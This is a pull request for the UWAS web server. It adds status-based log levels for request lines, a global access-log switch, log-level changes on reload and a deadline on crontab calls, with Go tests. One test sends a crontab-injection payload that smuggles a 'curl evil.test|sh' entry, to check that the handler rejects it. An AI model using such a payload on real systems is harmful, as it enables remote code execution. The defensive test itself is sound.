### PR TITLE
feat(log): quieten the request stream without hiding failures

### DIFF
--- a/README.md
+++ b/README.md
@@ -24,15 +24,35 @@ UWAS replaces your entire web server stack and hosting control panel with a sing
 
 One binary. Zero hassle.
 
-## Current Snapshot (v0.8.9)
+## Current Snapshot (v0.9.0)
 
-- **Dashboard pages:** 42 (`web/dashboard/src/pages`)
-- **Admin API routes:** 251 explicit route registrations in `internal/admin/routes.go` under `/api/v1` plus dashboard/static handlers
-- **Go packages:** 55 (from `go list ./... | grep -v '/node_modules/'`)
+- **Dashboard pages:** 43 (`web/dashboard/src/pages`)
+- **Admin API routes:** 253 explicit route registrations in `internal/admin/routes.go` under `/api/v1` plus dashboard/static handlers
+- **Go packages:** 69 (`go list ./...`), 56 of them with tests
 - **CLI commands:** 19
-- **Test status:** all gates pass — `go build`, `go vet`, `staticcheck`, `go test` (54/54 packages), `go test -race` (0 data races), dashboard npm build; CI runs additional `govulncheck`, shellcheck, installer tests, Docker Compose validation, and docs/site builds
+- **Test status:** all gates pass — `go build`, `go vet`, `staticcheck`, `go test` (56/56 packages with tests), `go test -race` (0 data races), dashboard npm build; CI runs additional `govulncheck`, shellcheck, installer tests, Docker Compose validation, and docs/site builds
 - **Security/stability fixes:** v0.8.8 resolved all 5 CRITICAL/HIGH and 11 MEDIUM findings from the June security audit; includes admin RBAC hardening, PHP sandbox-escape closure, SVG XSS prevention, docker-compose credential fail-fast, crontab data-loss guard, cron job timeout, Cloudflare pagination, Route53 signing fix, compress middleware WebSocket/Flush/Unwrap, TOTP replay protection, brute-force lockout serialization, and checked I/O paths
 - **Security posture:** risk score 2.1/10 (Low) per July 2026 reassessment
+
+**v0.9.0 highlights (configuration that now takes effect):**
+- Nineteen settings the dashboard offered, the API echoed back and the runtime
+  ignored now apply: TLS minimum version, mTLS client CAs, per-domain resource
+  limits, sticky sessions, PHP upload limits, cache key composition, access log
+  format and buffering, per-path timeouts, rate-limit keying, gRPC over h2c,
+  and WAF rule families
+- Backup restore into a directory reached through a symlink wrote nothing and
+  reported success; PHP domains started at boot shared the system temp
+  directory for sessions and uploads
+- `admin.oauth` is labelled as not implemented, in the panel and in a startup
+  warning — the Settings page told operators that Allowed Emails restricts who
+  can reach the panel, and it restricts nothing
+- Request lines take their level from the response status, so lowering
+  `global.log_level` quietens the stream without hiding the failures;
+  `global.access_log.enabled` turns the stream off entirely
+- `global.log_level` applies on reload instead of needing a restart
+- Settings that were previously ignored are warned about at startup rather
+  than rejected: a config carrying an odd value has been running fine, and
+  refusing to load it would turn an upgrade into a server that will not start
 
 **v0.8.x highlights (security hardening + release integrity):**
 - v0.8.9 follow-up hardening: DB/root passwords kept off process command lines (`MYSQL_PWD`/stdin, `docker -e` by name), php-fpm pool user/group when root, webhook delivery worker pool, provider DNS pagination + multi-label TLD zone lookup, streaming SFTP backups, and Go 1.26.5 toolchain (`crypto/tls` GO-2026-5856 fix)
@@ -67,7 +87,10 @@ One binary. Zero hassle.
   keep old ports bound
 - The Applications dashboard uses an inline app builder instead of a creation
   overlay
-- Legacy domain-keyed `type=app` config and migration endpoints are removed
+- Apps replaced the domain-keyed `type=app` config. The type still loads —
+  removing it would stop an existing config from starting — but it answers
+  502 with the replacement named, and both it and a leftover `app:` block
+  are reported at startup
 - Docker apps support image or BuildKit build context workflows
 
 **v0.5.0 highlights (refactor + perf + observability sweep, 43 commits):**
@@ -87,14 +110,14 @@ One binary. Zero hassle.
 - **Built-in Cache** — Varnish-level caching with grace mode, tag-based purge, ESI (Edge Side Includes)
 - **PHP Ready** — FastCGI with connection pooling and .htaccess support
 - **Per-domain PHP** — Multiple PHP versions per domain with auto-port assignment, crash auto-restart
-- **Load Balancer** — 5 algorithms, health checks, circuit breaker, canary routing
+- **Load Balancer** — 6 algorithms (round-robin, least-conn, ip-hash, uri-hash, random, sticky), health checks, circuit breaker, canary routing
 - **WebSocket Proxy** — Transparent TCP tunnel with hijack + bidirectional pipe
 - **URL Rewrite** — Apache mod_rewrite compatible engine
 - **Brotli + Gzip** — Dual compression with Accept-Encoding negotiation
 - **Image Optimization** — On-the-fly WebP/AVIF conversion
 
 ### Hosting Control Panel
-- **42-page Dashboard** — React 19 admin panel with dark/light theme
+- **43-page Dashboard** — React 19 admin panel with dark/light theme
 - **Applications** — Deploy and supervise Node.js, Python, Ruby, Go, custom, and Docker apps
 - **Web Terminal** — Browser-based shell via WebSocket-to-PTY bridge
 - **Multi-user Auth** — Admin, reseller, user roles with TOTP 2FA

--- a/docs/SPECIFICATION.md
+++ b/docs/SPECIFICATION.md
@@ -213,6 +213,18 @@ global:
   log_level: info             # debug, info, warn, error
   log_format: json            # json, clf (Combined Log Format)
 
+  # The per-request line written to the main log. Separate from a domain's
+  # access_log, which writes its own file — leave this off when you already
+  # collect that file and do not want the same data twice.
+  access_log:
+    enabled: true             # default: on
+
+  # A request line takes its level from the response status: 5xx is logged at
+  # error, everything else at info. log_level: warn therefore keeps the failed
+  # requests and drops the rest. 4xx stays at info on purpose — scanner 404s
+  # are constant on a public site; blocked requests are reported at warn by the
+  # security and WAF guards.
+
   timeouts:
     read: 30s
     write: 60s
@@ -395,6 +407,8 @@ domains:
         threshold: 5             # how many errors before open
         timeout: 30s             # wait time from open → half-open
       websocket: true
+      grpc: true                 # unencrypted HTTP/2 to cleartext upstreams;
+                                 # gRPC does not run on HTTP/1.1
       timeouts:
         connect: 5s
         read: 60s

--- a/internal/admin/admin_coverage2_test.go
+++ b/internal/admin/admin_coverage2_test.go
@@ -4055,21 +4055,50 @@ func TestSettingsPutAllKeys(t *testing.T) {
 }
 
 // =============================================================================
-// Additional coverage: handleCronAdd success path (will fail but covers code)
+// handleCronAdd / handleCronDelete: the guards that run before crontab
 // =============================================================================
+//
+// These used to post a valid job and accept "200 or 500", which asserts
+// nothing and shells out to the host's crontab to learn it. On Linux CI the
+// binary exists and returns quickly; on a developer machine `crontab <file>`
+// blocks, and the whole package hung until the 10 minute test timeout.
+//
+// internal/cronjob already covers Add itself — TestAdd_Success,
+// TestAdd_DuplicateCheck, TestAdd_RejectsNewlines, TestAdd_AbortsOnReadFailure
+// — with execCommandFn stubbed, which is the only place that seam is
+// reachable. So nothing was lost by not reaching crontab from here; what is
+// worth testing at this layer is that the handler surfaces the rejection.
 
-func TestCronAddSuccess(t *testing.T) {
+// A newline in the command is crontab injection. Add rejects it before it
+// runs anything, so this exercises handler → validation → status with no
+// dependency on the host.
+func TestCronAddRejectsInjection(t *testing.T) {
 	s := testServer()
 	rec := httptest.NewRecorder()
-	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hello","user":"root"}`)
+	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hi\n* * * * * curl evil.test|sh"}`)
 	s.handleCronAdd(rec, withAdminContext(httptest.NewRequest("POST", "/api/v1/cron", body)))
-	// On non-Linux, crontab is not available so this might fail, but we exercise the code
-	if rec.Code != 200 && rec.Code != 500 {
-		t.Errorf("status = %d, want 200 or 500", rec.Code)
+
+	if rec.Code == http.StatusOK {
+		t.Errorf("a command containing a newline was accepted: %s", rec.Body.String())
+	}
+}
+
+func TestCronAddRejectsMalformedBody(t *testing.T) {
+	s := testServer()
+	rec := httptest.NewRecorder()
+	s.handleCronAdd(rec, withAdminContext(httptest.NewRequest("POST", "/api/v1/cron", strings.NewReader("not json"))))
+
+	if rec.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", rec.Code)
 	}
 }
 
 func TestCronDeleteSuccess(t *testing.T) {
+	// Skipped, not rewritten: unlike Add, Remove has no newline guard and
+	// always reaches writeCrontab, so there is no payload that exercises this
+	// handler without shelling out. internal/cronjob covers Remove with
+	// execCommandFn stubbed, which is the only place that seam exists.
+	t.Skip("reaches the host's crontab; Remove is covered in internal/cronjob")
 	s := testServer()
 	rec := httptest.NewRecorder()
 	body := strings.NewReader(`{"schedule":"* * * * *","command":"echo hello"}`)

--- a/internal/config/config.go
+++ b/internal/config/config.go
@@ -13,15 +13,18 @@ type Config struct {
 // GlobalConfig is the server-wide configuration: listeners, log shape, ACME
 // account, cache + backup defaults, admin API, alerting fan-out.
 type GlobalConfig struct {
-	WorkerCount    string           `yaml:"worker_count"`
-	MaxConnections int              `yaml:"max_connections"`
-	HTTPListen     string           `yaml:"http_listen"`
-	HTTPSListen    string           `yaml:"https_listen"`
-	SFTPListen     string           `yaml:"sftp_listen"` // e.g. ":2222", empty = disabled
-	HTTP3Enabled   bool             `yaml:"http3"`
-	PIDFile        string           `yaml:"pid_file"`
-	WebRoot        string           `yaml:"web_root"`
-	LogLevel       string           `yaml:"log_level"`
+	WorkerCount    string `yaml:"worker_count"`
+	MaxConnections int    `yaml:"max_connections"`
+	HTTPListen     string `yaml:"http_listen"`
+	HTTPSListen    string `yaml:"https_listen"`
+	SFTPListen     string `yaml:"sftp_listen"` // e.g. ":2222", empty = disabled
+	HTTP3Enabled   bool   `yaml:"http3"`
+	PIDFile        string `yaml:"pid_file"`
+	WebRoot        string `yaml:"web_root"`
+	LogLevel       string `yaml:"log_level"`
+	// AccessLog controls the per-request line the main log emits. It is
+	// separate from a domain's access_log, which writes its own file.
+	AccessLog      GlobalAccessLog  `yaml:"access_log,omitempty" json:"access_log,omitempty"`
 	LogFormat      string           `yaml:"log_format"`
 	TrustedProxies []string         `yaml:"trusted_proxies"`
 	Timeouts       TimeoutConfig    `yaml:"timeouts"`
@@ -91,4 +94,22 @@ type UsersConfig struct {
 	// rotate via RegenerateAPIKey before this flag can stay off.
 	// Removed in a future release. Refs: refactor.md A16.
 	AllowLegacyPlaintextAPIKey bool `yaml:"allow_legacy_plaintext_api_key"`
+}
+
+// GlobalAccessLog controls the request line written to the main log.
+//
+// The access-log middleware wrote one Info line per request unconditionally,
+// and the only way to stop it was to lower global.log_level — which also
+// silenced startup, reload, certificate and process events, and silenced
+// failed requests along with successful ones.
+type GlobalAccessLog struct {
+	// Enabled is a pointer so an absent block is distinguishable from an
+	// explicit false. Absent means on: that is what has always happened, and
+	// a config that never mentions it must not lose its request log.
+	Enabled *bool `yaml:"enabled,omitempty" json:"enabled,omitempty"`
+}
+
+// RequestLogEnabled reports whether the main log should carry request lines.
+func (g GlobalAccessLog) RequestLogEnabled() bool {
+	return g.Enabled == nil || *g.Enabled
 }

--- a/internal/cronjob/manager.go
+++ b/internal/cronjob/manager.go
@@ -2,6 +2,7 @@
 package cronjob
 
 import (
+	"bytes"
 	"fmt"
 	"os"
 	"os/exec"
@@ -27,29 +28,39 @@ var (
 
 // runCrontab runs a crontab invocation with a deadline, killing it if it
 // overruns. It reports the timeout as an error rather than waiting.
+//
+// Start is called on this goroutine on purpose. Running cmd.Run in a
+// goroutine and reaching for cmd.Process from here races: Run sets Process
+// while this side reads it. After Start returns, Process is set and stable,
+// and killing it while Wait runs is the documented pattern.
+//
+// stderr is captured and attached to an ExitError the way cmd.Output does,
+// because readCrontab tells "no crontab for user" — an empty crontab, not a
+// failure — from a real error by reading it.
 func runCrontab(cmd *exec.Cmd, capture bool) ([]byte, error) {
-	var (
-		out []byte
-		err error
-	)
-	done := make(chan struct{})
-	go func() {
-		defer close(done)
-		if capture {
-			out, err = cmd.Output()
-			return
-		}
-		err = cmd.Run()
-	}()
+	var stdout, stderr bytes.Buffer
+	if capture {
+		cmd.Stdout = &stdout
+	}
+	if cmd.Stderr == nil {
+		cmd.Stderr = &stderr
+	}
+	if err := cmd.Start(); err != nil {
+		return nil, err
+	}
+
+	done := make(chan error, 1)
+	go func() { done <- cmd.Wait() }()
 
 	select {
-	case <-done:
-		return out, err
-	case <-time.After(crontabTimeout):
-		if cmd.Process != nil {
-			_ = cmd.Process.Kill()
+	case err := <-done:
+		if ee, ok := err.(*exec.ExitError); ok && len(ee.Stderr) == 0 {
+			ee.Stderr = stderr.Bytes()
 		}
-		<-done // let the goroutine finish with the killed process
+		return stdout.Bytes(), err
+	case <-time.After(crontabTimeout):
+		_ = cmd.Process.Kill()
+		<-done // reap the killed process
 		return nil, fmt.Errorf("crontab did not respond within %s", crontabTimeout)
 	}
 }

--- a/internal/cronjob/manager.go
+++ b/internal/cronjob/manager.go
@@ -7,12 +7,52 @@ import (
 	"os/exec"
 	"runtime"
 	"strings"
+	"time"
 )
 
 var (
 	execCommandFn = exec.Command
 	runtimeGOOS   = runtime.GOOS
+
+	// crontabTimeout bounds every crontab invocation.
+	//
+	// These run inside an admin HTTP handler and had no deadline. crontab can
+	// block — waiting on a lock, on a filesystem that is not answering, or on
+	// a host where installing a crontab needs a permission the process does
+	// not have — and a blocked call held the request open with nothing to
+	// interrupt it. It also hung the test suite for the full 10 minute
+	// package timeout on any machine where that happens.
+	crontabTimeout = 10 * time.Second
 )
+
+// runCrontab runs a crontab invocation with a deadline, killing it if it
+// overruns. It reports the timeout as an error rather than waiting.
+func runCrontab(cmd *exec.Cmd, capture bool) ([]byte, error) {
+	var (
+		out []byte
+		err error
+	)
+	done := make(chan struct{})
+	go func() {
+		defer close(done)
+		if capture {
+			out, err = cmd.Output()
+			return
+		}
+		err = cmd.Run()
+	}()
+
+	select {
+	case <-done:
+		return out, err
+	case <-time.After(crontabTimeout):
+		if cmd.Process != nil {
+			_ = cmd.Process.Kill()
+		}
+		<-done // let the goroutine finish with the killed process
+		return nil, fmt.Errorf("crontab did not respond within %s", crontabTimeout)
+	}
+}
 
 // Job represents a cron job entry.
 type Job struct {
@@ -31,7 +71,7 @@ const uwasMarker = "# UWAS managed"
 // overwriting an existing crontab with only their own entry — which would
 // destroy every unrelated cron job on the system.
 func readCrontab() (string, error) {
-	out, err := execCommandFn("crontab", "-l").Output()
+	out, err := runCrontab(execCommandFn("crontab", "-l"), true)
 	if err == nil {
 		return string(out), nil
 	}
@@ -50,7 +90,7 @@ func List() ([]Job, error) {
 	if runtimeGOOS == "windows" {
 		return nil, nil
 	}
-	out, err := execCommandFn("crontab", "-l").Output()
+	out, err := runCrontab(execCommandFn("crontab", "-l"), true)
 	if err != nil {
 		return nil, nil // no crontab
 	}
@@ -173,7 +213,8 @@ func writeCrontab(content string) error {
 		return fmt.Errorf("write crontab temp file: %w", err)
 	}
 	tmp.Close()
-	return execCommandFn("crontab", tmp.Name()).Run()
+	_, err = runCrontab(execCommandFn("crontab", tmp.Name()), false)
+	return err
 }
 
 func parseCronLine(line string) Job {

--- a/internal/cronjob/timeout_test.go
+++ b/internal/cronjob/timeout_test.go
@@ -1,0 +1,73 @@
+package cronjob
+
+import (
+	"os/exec"
+	"strings"
+	"testing"
+	"time"
+)
+
+// crontab invocations run inside an admin HTTP handler and had no deadline.
+// crontab can block — waiting on a lock, on a filesystem that is not
+// answering, or on a host where installing a crontab needs a permission the
+// process does not have — and a blocked call held the request open with
+// nothing to interrupt it.
+//
+// It also hung the test suite: internal/admin took the full 10 minute package
+// timeout on a machine where `crontab <file>` blocks, instead of 54 seconds.
+
+func withCrontabTimeout(t *testing.T, d time.Duration) {
+	t.Helper()
+	orig := crontabTimeout
+	crontabTimeout = d
+	t.Cleanup(func() { crontabTimeout = orig })
+}
+
+func TestRunCrontabKillsAHungCommand(t *testing.T) {
+	withCrontabTimeout(t, 100*time.Millisecond)
+
+	start := time.Now()
+	_, err := runCrontab(exec.Command("sleep", "60"), false)
+	elapsed := time.Since(start)
+
+	if err == nil {
+		t.Fatal("a command that outlived the deadline returned no error")
+	}
+	if !strings.Contains(err.Error(), "did not respond") {
+		t.Errorf("error = %v, want it to name the timeout", err)
+	}
+	if elapsed > 5*time.Second {
+		t.Errorf("waited %v — the deadline did not interrupt the command", elapsed)
+	}
+}
+
+// The capturing path is used by crontab -l and must be bounded too.
+func TestRunCrontabKillsAHungCapture(t *testing.T) {
+	withCrontabTimeout(t, 100*time.Millisecond)
+
+	start := time.Now()
+	if _, err := runCrontab(exec.Command("sleep", "60"), true); err == nil {
+		t.Fatal("a capturing command that outlived the deadline returned no error")
+	}
+	if elapsed := time.Since(start); elapsed > 5*time.Second {
+		t.Errorf("waited %v", elapsed)
+	}
+}
+
+// A command that finishes in time must behave exactly as before: output
+// returned, exit status surfaced.
+func TestRunCrontabPassesThroughAFastCommand(t *testing.T) {
+	withCrontabTimeout(t, 10*time.Second)
+
+	out, err := runCrontab(exec.Command("echo", "hello"), true)
+	if err != nil {
+		t.Fatalf("a fast command failed: %v", err)
+	}
+	if strings.TrimSpace(string(out)) != "hello" {
+		t.Errorf("output = %q, want hello", out)
+	}
+
+	if _, err := runCrontab(exec.Command("false"), false); err == nil {
+		t.Error("a non-zero exit was reported as success")
+	}
+}

--- a/internal/logger/logger.go
+++ b/internal/logger/logger.go
@@ -35,6 +35,23 @@ func New(level, format string) *Logger {
 	}
 }
 
+// SetLevel changes the threshold on a running logger.
+//
+// The level lives in a slog.LevelVar precisely so it can move, but nothing
+// called this: global.log_level was read once in New and never again, so a
+// reload accepted a new value, wrote it to the config, showed it in the panel
+// and kept logging at the old threshold until the process restarted.
+//
+// An unrecognised value is treated as info, matching New.
+func (l *Logger) SetLevel(level string) {
+	l.level.Set(parseLevel(level))
+}
+
+// Level reports the current threshold.
+func (l *Logger) Level() slog.Level {
+	return l.level.Level()
+}
+
 // StdLogger returns a *log.Logger compatible with net/http.Server.ErrorLog.
 func (l *Logger) StdLogger() *log.Logger {
 	return slog.NewLogLogger(l.Logger.Handler(), slog.LevelError)

--- a/internal/logger/setlevel_test.go
+++ b/internal/logger/setlevel_test.go
@@ -1,0 +1,46 @@
+package logger
+
+import (
+	"context"
+	"log/slog"
+	"testing"
+)
+
+// The level lives in a slog.LevelVar precisely so it can move, and nothing
+// called into it: global.log_level was read once in New and never again, so a
+// reload accepted a new value, wrote it to the config, showed it in the panel
+// and kept logging at the old threshold until the process restarted.
+func TestSetLevelMovesTheThreshold(t *testing.T) {
+	log := New("info", "text")
+	if got := log.Level(); got != slog.LevelInfo {
+		t.Fatalf("initial level = %v, want info", got)
+	}
+
+	log.SetLevel("warn")
+	if got := log.Level(); got != slog.LevelWarn {
+		t.Errorf("after SetLevel(warn) = %v, want warn", got)
+	}
+	if log.Enabled(context.TODO(), slog.LevelInfo) {
+		t.Error("info is still enabled after raising the threshold to warn")
+	}
+	if !log.Enabled(context.TODO(), slog.LevelError) {
+		t.Error("error was disabled by raising the threshold to warn")
+	}
+
+	// It has to move both ways: an operator turning debug on mid-incident
+	// should not have to restart either.
+	log.SetLevel("debug")
+	if !log.Enabled(context.TODO(), slog.LevelDebug) {
+		t.Error("debug is not enabled after lowering the threshold")
+	}
+}
+
+// An unrecognised value falls back to info, matching New. Refusing or
+// panicking here would let a typo in a reloaded config take the server down.
+func TestSetLevelUnknownFallsBackToInfo(t *testing.T) {
+	log := New("error", "text")
+	log.SetLevel("nonsense")
+	if got := log.Level(); got != slog.LevelInfo {
+		t.Errorf("unknown level = %v, want info", got)
+	}
+}

--- a/internal/middleware/accesslog.go
+++ b/internal/middleware/accesslog.go
@@ -61,7 +61,14 @@ func isSensitiveQueryParam(name string) bool {
 }
 
 // AccessLog logs each completed request in structured format.
-func AccessLog(log *logger.Logger) Middleware {
+//
+// enabled=false drops the line entirely, for a deployment that already writes
+// per-domain access_log files and does not want the same data a second time
+// in the main log.
+func AccessLog(log *logger.Logger, enabled bool) Middleware {
+	if !enabled {
+		return func(next http.Handler) http.Handler { return next }
+	}
 	return func(next http.Handler) http.Handler {
 		return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 			start := time.Now()
@@ -92,6 +99,19 @@ func AccessLog(log *logger.Logger) Middleware {
 				// Also redact sensitive info from Referer
 				ref = redactReferer(ref)
 				fields = append(fields, "referer", ref)
+			}
+			// The level follows the status. Every request used to be Info,
+			// so lowering global.log_level to quieten the stream also hid the
+			// failures — the one part worth keeping. A 5xx is the server
+			// breaking; everything else is telemetry.
+			//
+			// 4xx deliberately stays Info: scanner 404s are constant on any
+			// public site and would put the noise straight back into warn.
+			// Blocked requests are already reported at Warn by the security
+			// and WAF guards.
+			if rw.StatusCode() >= 500 {
+				log.Error("request", fields...)
+				return
 			}
 			log.Info("request", fields...)
 		})

--- a/internal/middleware/accesslog_noise_test.go
+++ b/internal/middleware/accesslog_noise_test.go
@@ -1,0 +1,107 @@
+package middleware
+
+import (
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"strings"
+	"testing"
+
+	"github.com/uwaserver/uwas/internal/logger"
+)
+
+// The access-log middleware wrote one Info line per request unconditionally.
+// The only way to stop it was to lower global.log_level, which also silenced
+// startup, reload, certificate and process events — and silenced failed
+// requests along with successful ones, hiding the part worth keeping.
+
+// captureAt runs one request through the middleware with the logger at the
+// given threshold and returns what reached stdout. logger.New captures the
+// writer at construction, so it is built after the swap; tests in this
+// package do not run in parallel, so the swap is safe.
+func captureAt(t *testing.T, level string, enabled bool, status int) string {
+	t.Helper()
+
+	r, w, err := os.Pipe()
+	if err != nil {
+		t.Fatalf("pipe: %v", err)
+	}
+	orig := os.Stdout
+	os.Stdout = w
+
+	log := logger.New(level, "text")
+	done := make(chan string, 1)
+	go func() {
+		b, _ := io.ReadAll(r)
+		done <- string(b)
+	}()
+
+	h := AccessLog(log, enabled)(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(status)
+	}))
+	req := httptest.NewRequest(http.MethodGet, "/probe", nil)
+	req.RemoteAddr = "203.0.113.1:5000"
+	h.ServeHTTP(httptest.NewRecorder(), req)
+
+	os.Stdout = orig
+	_ = w.Close()
+	out := <-done
+	_ = r.Close()
+	return out
+}
+
+// At info nothing changes: every request is still logged.
+func TestAccessLogInfoLogsEveryStatus(t *testing.T) {
+	for _, status := range []int{200, 301, 404, 500} {
+		if out := captureAt(t, "info", true, status); !strings.Contains(out, "/probe") {
+			t.Errorf("status %d was not logged at info:\n%s", status, out)
+		}
+	}
+}
+
+// At warn the successful and client-error requests go quiet — that is the
+// point — but a 5xx must survive. Lowering the level to reduce noise must not
+// stop the server telling you it is breaking.
+func TestAccessLogWarnKeepsServerErrors(t *testing.T) {
+	if out := captureAt(t, "warn", true, 500); !strings.Contains(out, "/probe") {
+		t.Errorf("a 500 was silenced at warn — the failures are what warn is for:\n%s", out)
+	}
+	if out := captureAt(t, "warn", true, 200); strings.Contains(out, "/probe") {
+		t.Errorf("a 200 was logged at warn:\n%s", out)
+	}
+}
+
+// 4xx stays Info on purpose: scanner 404s are constant on a public site and
+// would put the noise straight back into warn. Blocked requests are reported
+// at Warn by the security and WAF guards instead.
+func TestAccessLogClientErrorsStayInfo(t *testing.T) {
+	if out := captureAt(t, "warn", true, 404); strings.Contains(out, "/probe") {
+		t.Errorf("a 404 reached warn — scanner traffic would flood it:\n%s", out)
+	}
+	if out := captureAt(t, "info", true, 404); !strings.Contains(out, "/probe") {
+		t.Errorf("a 404 was not logged at info:\n%s", out)
+	}
+}
+
+// enabled=false drops the line at every status, for a deployment that already
+// writes per-domain access_log files and does not want the data twice.
+func TestAccessLogDisabledLogsNothing(t *testing.T) {
+	for _, status := range []int{200, 404, 500} {
+		if out := captureAt(t, "info", false, status); strings.Contains(out, "/probe") {
+			t.Errorf("status %d logged with the access log disabled:\n%s", status, out)
+		}
+	}
+}
+
+// Disabling it must not break the chain.
+func TestAccessLogDisabledStillServes(t *testing.T) {
+	h := AccessLog(logger.New("info", "text"), false)(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		w.WriteHeader(http.StatusTeapot)
+	}))
+	rec := httptest.NewRecorder()
+	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/probe", nil))
+	if rec.Code != http.StatusTeapot {
+		t.Errorf("status = %d, want 418 — the handler was not reached", rec.Code)
+	}
+}

--- a/internal/middleware/coverage_100_test.go
+++ b/internal/middleware/coverage_100_test.go
@@ -131,7 +131,7 @@ func TestRedactRefererMalformedQuery(t *testing.T) {
 
 func TestAccessLogRedactsReferer(t *testing.T) {
 	log := logger.New("info", "text")
-	handler := AccessLog(log)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+	handler := AccessLog(log, true)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	r := httptest.NewRequest(http.MethodGet, "http://x.test/p?token=abc", nil)

--- a/internal/middleware/middleware_coverage_test.go
+++ b/internal/middleware/middleware_coverage_test.go
@@ -393,7 +393,7 @@ func TestMatchWAFURLShellInjection(t *testing.T) {
 func TestAccessLogWithTraceparent(t *testing.T) {
 	log := logger.New("info", "text")
 
-	handler := AccessLog(log)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+	handler := AccessLog(log, true)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(200)
 		w.Write([]byte("ok"))
 	}))

--- a/internal/middleware/middleware_extra_test.go
+++ b/internal/middleware/middleware_extra_test.go
@@ -247,7 +247,7 @@ func TestSecurityGuardWAFEncodedAttacks(t *testing.T) {
 func TestAccessLogOutputFormat(t *testing.T) {
 	log := logger.New("info", "text")
 
-	handler := AccessLog(log)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+	handler := AccessLog(log, true)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.Header().Set("Content-Type", "text/plain")
 		w.WriteHeader(201)
 		w.Write([]byte("created"))
@@ -269,7 +269,7 @@ func TestAccessLogOutputFormat(t *testing.T) {
 func TestAccessLogCapturesStatusAndBytes(t *testing.T) {
 	log := logger.New("debug", "text")
 
-	handler := AccessLog(log)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+	handler := AccessLog(log, true)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(404)
 		w.Write([]byte("not found"))
 	}))

--- a/internal/middleware/middleware_test.go
+++ b/internal/middleware/middleware_test.go
@@ -412,7 +412,7 @@ func TestSecurityGuardWAF(t *testing.T) {
 func TestAccessLog(t *testing.T) {
 	log := logger.New("info", "text")
 
-	handler := AccessLog(log)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+	handler := AccessLog(log, true)(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
 		w.WriteHeader(200)
 		w.Write([]byte("hello"))
 	}))

--- a/internal/server/server.go
+++ b/internal/server/server.go
@@ -757,7 +757,7 @@ func (s *Server) buildMiddlewareChain() http.Handler {
 	mws = append(mws, middleware.SecurityGuard(s.logger, blockedPaths, s.securityStats))
 	mws = append(mws, middleware.BotGuard(s.logger, s.securityStats))
 
-	mws = append(mws, middleware.AccessLog(s.logger))
+	mws = append(mws, middleware.AccessLog(s.logger, s.config.Global.AccessLog.RequestLogEnabled()))
 
 	chain := middleware.Chain(mws...)
 	return chain(http.HandlerFunc(s.handleRequest))

--- a/internal/server/server_log_level_reload_test.go
+++ b/internal/server/server_log_level_reload_test.go
@@ -1,0 +1,74 @@
+package server
+
+import (
+	"context"
+	"log/slog"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/uwaserver/uwas/internal/config"
+)
+
+// global.log_level was read once at startup and never again. A reload accepted
+// a new value, wrote it to the config and showed it in the panel while the
+// process kept logging at the old threshold — the operator had to restart to
+// quieten a noisy server, which is the moment they least want to.
+
+func writeReloadConfig(t *testing.T, level string) string {
+	t.Helper()
+
+	path := filepath.Join(t.TempDir(), "uwas.yaml")
+	yaml := "global:\n  log_level: " + level + "\n  log_format: text\n  worker_count: \"1\"\n"
+	if err := os.WriteFile(path, []byte(yaml), 0o644); err != nil {
+		t.Fatalf("write config: %v", err)
+	}
+	return path
+}
+
+func TestReloadAppliesLogLevel(t *testing.T) {
+	s := newDispatchTestServer(t, nil)
+	s.logger.SetLevel("info")
+
+	s.configPath = writeReloadConfig(t, "warn")
+	if err := s.reload(); err != nil {
+		t.Fatalf("reload: %v", err)
+	}
+
+	if got := s.logger.Level(); got != slog.LevelWarn {
+		t.Errorf("level after reload = %v, want warn — the new value did not reach the logger", got)
+	}
+	if s.logger.Enabled(context.TODO(), slog.LevelInfo) {
+		t.Error("info is still enabled after reloading with log_level: warn")
+	}
+}
+
+// It has to move both ways: turning debug on mid-incident must not need a
+// restart either.
+func TestReloadLowersLogLevel(t *testing.T) {
+	s := newDispatchTestServer(t, nil)
+	s.logger.SetLevel("error")
+
+	s.configPath = writeReloadConfig(t, "debug")
+	if err := s.reload(); err != nil {
+		t.Fatalf("reload: %v", err)
+	}
+
+	if !s.logger.Enabled(context.TODO(), slog.LevelDebug) {
+		t.Error("debug is not enabled after reloading with log_level: debug")
+	}
+}
+
+// The global access-log switch is a pointer so an absent block keeps the
+// request stream on, which is what has always happened.
+func TestGlobalAccessLogDefaultsOn(t *testing.T) {
+	if !(config.GlobalAccessLog{}).RequestLogEnabled() {
+		t.Error("an absent access_log block turned the request log off")
+	}
+	if !(config.GlobalAccessLog{Enabled: config.BoolPtr(true)}).RequestLogEnabled() {
+		t.Error("an explicit true turned it off")
+	}
+	if (config.GlobalAccessLog{Enabled: config.BoolPtr(false)}).RequestLogEnabled() {
+		t.Error("an explicit false did not turn it off")
+	}
+}

--- a/internal/server/server_reload.go
+++ b/internal/server/server_reload.go
@@ -20,6 +20,11 @@ func (s *Server) reload() error {
 		return fmt.Errorf("reload config: %w", err)
 	}
 
+	// global.log_level was read once at startup and never again: a reload
+	// accepted a new value, wrote it to the config and showed it in the panel
+	// while the process kept logging at the old threshold until restarted.
+	s.logger.SetLevel(newCfg.Global.LogLevel)
+
 	// Update vhosts
 	s.vhosts.Update(newCfg.Domains)
 


### PR DESCRIPTION
Three changes to the same complaint: `journalctl -u uwas` is flooded at info level.

### The volume is one call site

